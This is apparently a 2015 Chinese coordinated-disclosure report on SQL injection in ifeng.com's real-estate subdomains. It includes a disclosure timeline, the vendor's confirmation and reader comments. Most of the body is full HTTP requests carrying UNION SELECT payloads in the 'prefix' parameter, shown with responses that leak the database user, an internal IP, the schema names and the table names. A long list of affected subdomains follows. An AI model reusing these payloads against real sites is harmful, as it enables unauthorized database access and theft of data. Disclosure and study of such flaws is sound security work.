2015-10-26: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
house.ifeng.com的二级域名都存在注入,直接可查sql
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,user(),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://hn.house.ifeng.com/columnCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip, deflateHost: hn.house.ifeng.comCookie: ifh_site=17649%2Chn; city_redirected=13HTTP/1.1 200 OKServer: ifengweb/1.2.8Date: Sat, 24 Oct 2015 09:38:52 GMTContent-Type: text/htmlConnection: closeVary: Accept-EncodingContent-Length: 141jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1aapphouse_rw@10.129.2.150","theurl":null}])GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+count(*)FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a5","theurl":null}])GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(select+distinct+group_concat(0x7e,schema_name,0x7e)+FROM+information_schema.schemata),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://hn.house.ifeng.com/columnCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip, deflateHost: hn.house.ifeng.comCookie: ifh_site=17649%2Chn; city_redirected=13jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1a~information_schema~,~app_house~,~estate_house~,~test~","theurl":null}])
GET /sale/search/guide?city=17649&prefix=%e4%b8%ad%e9%93%81%c2%b7%e5%ad%90%e6%82%a6%e5%8f%b0'+UNION+ALL+SELECT+NULL,NULL,(SELECT+group_concat(table_name)+FROM+information_schema.tables+WHERE+table_schema='app_house'),NULL--+&jsoncallback=jQuery17207547671820502728_1445636962245&type=undefined HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5Accept: */*Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5Referer: http://hn.house.ifeng.com/columnCache-Control: no-cacheX-Forwarded-For: 127.0.0.1Accept-Encoding: gzip, deflateHost: gz.house.ifeng.comCookie: ifh_site=17649%2Chn; city_redirected=13HTTP/1.1 200 OKServer: ifengweb/1.2.8Date: Sat, 24 Oct 2015 10:59:55 GMTContent-Type: text/htmlConnection: closeVary: Accept-EncodingContent-Length: 458jQuery17207547671820502728_1445636962245([{"data":"\u60a8\u8981\u627e\u7684\u662f\u4e0d\u662f\uff1aacl_func,acl_group,acl_group_func,acl_module,acl_page,acl_permission,acl_role,acl_role_permission,acl_user_role,cache,city_phone,fyh_activity,fyh_game_egg,fyh_game_egg_prize,fyh_game_egg_prizedetail,fyh_game_egg_user,fyh_log,fyh_phone,fyh_pic,fyh_special,fyh_user,fyh_user_activity,house_acl_user,house_menu,lp_apply,lp_area,lp_area_vw,lp_ci","theurl":null}])
不完全统计有如下网站存在该漏洞
1010.house.ifeng.com27taobao.house.ifeng.com2c.house.ifeng.com2fapp.house.ifeng.com2fbaike.house.ifeng.com2fcd.house.ifeng.com2fdl.house.ifeng.com2fgz.house.ifeng.com2fhz.house.ifeng.com2fsh.house.ifeng.com2fsz.house.ifeng.com2fzz.house.ifeng.com7bbs.house.ifeng.com8gz.house.ifeng.comapp.house.ifeng.comapp10e0.house.ifeng.combbs.house.ifeng.combd.house.ifeng.combj.house.ifeng.comblog.house.ifeng.comcd.house.ifeng.comcft.house.ifeng.comchangsha.house.ifeng.comchengde.house.ifeng.comclub.house.ifeng.comcomapp.house.ifeng.comcq.house.ifeng.comdl.house.ifeng.comeb.house.ifeng.comfj.house.ifeng.comgmtdl.house.ifeng.comgu.house.ifeng.comgy.house.ifeng.comgz.house.ifeng.comhd.house.ifeng.comhf.house.ifeng.comhn.house.ifeng.comhouse.ifeng.comhs.house.ifeng.comhttpapp.house.ifeng.comhttpbbs.house.ifeng.comhuizhou.house.ifeng.comhz.house.ifeng.comi.ifeng.comj.house.ifeng.comjn.house.ifeng.comjr.house.ifeng.comld.house.ifeng.comly.house.ifeng.comlz.house.ifeng.commy.house.ifeng.comnb.house.ifeng.comnews.house.ifeng.comnj.house.ifeng.comnn.house.ifeng.comnt.house.ifeng.comopencity.house.ifeng.comp2p.house.ifeng.comqd.house.ifeng.comqhd.house.ifeng.comqz.house.ifeng.coms.house.ifeng.comsh.house.ifeng.comsy.house.ifeng.comsz.house.ifeng.comtaobao.house.ifeng.comtj.house.ifeng.comtoblog.house.ifeng.comtotaobao.house.ifeng.comtty.house.ifeng.comu002fsh.house.ifeng.comweifang.house.ifeng.comweihai.house.ifeng.comworld.house.ifeng.comxa.house.ifeng.comxm.house.ifeng.comxt.house.ifeng.comyantai.house.ifeng.comyt.house.ifeng.comz.house.ifeng.comzz.house.ifeng.com
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 15:45
非常感谢您对凤凰网信息安全的帮助,不过这是一套程序,泛解析到了一组业务中,并非“上百网站”。
暂无
王婆婆来此关注
厂商秒确认呀